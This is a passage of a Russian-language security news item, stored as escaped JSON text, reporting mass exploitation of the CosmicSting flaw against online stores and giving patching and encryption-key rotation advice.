\u0447\u0442\u043e\u00a0\u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u044e\u043d\u044f \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0435\u0440\u0435\u0448\u043b\u0438 \u0432 \u0444\u0430\u0437\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u0422\u0430\u043a, \u043a\u0430\u0436\u0434\u044b\u0439 \u0447\u0430\u0441 \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0442\u0440\u0435\u0445 \u0434\u043e \u043f\u044f\u0442\u0438 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0431\u0440\u0435\u043d\u0434\u044b.\n\n\u041a\u0430\u043a \u0438 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u043d\u0435\u0435, \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u043a\u0440\u0430\u0439\u043d\u0435 \u0432\u0430\u0436\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0438\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c\u00a0\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435. \n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f CosmicSting, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0431\u0443\u0434\u0435\u0442 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e.\n\n\u0423\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0435\u0431-\u0442\u043e\u043a\u0435\u043d\u044b \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f, \u0442\u0430\u043a \u0447\u0442\u043e \u043a\u043b\u044e\u0447 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u043d\u043e\u0432\u043e\u0433\u043e \u043a\u043b\u044e\u0447\u0430 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0435 \u0434\u0435\u043b\u0430\u0435\u0442 \u0441\u0442\u0430\u0440\u044b\u0439 \u043a\u043b\u044e\u0447 \u043d\u0435\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0442\u0430\u0440\u044b\u0439 \u043a\u043b\u044e\u0447 \u0432 app/etc/env.php \u0434\u043e \u043d\u043e\u0432\u043e\u0433\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u0430 \u043d\u0435 \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0435\u0433\u043e.\n\n\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 - \u0432 \u0431\u043b\u043e\u0433\u0435 SanSec.", "creation_timestamp": "2024-07-15T16:20:05.000000Z"}]}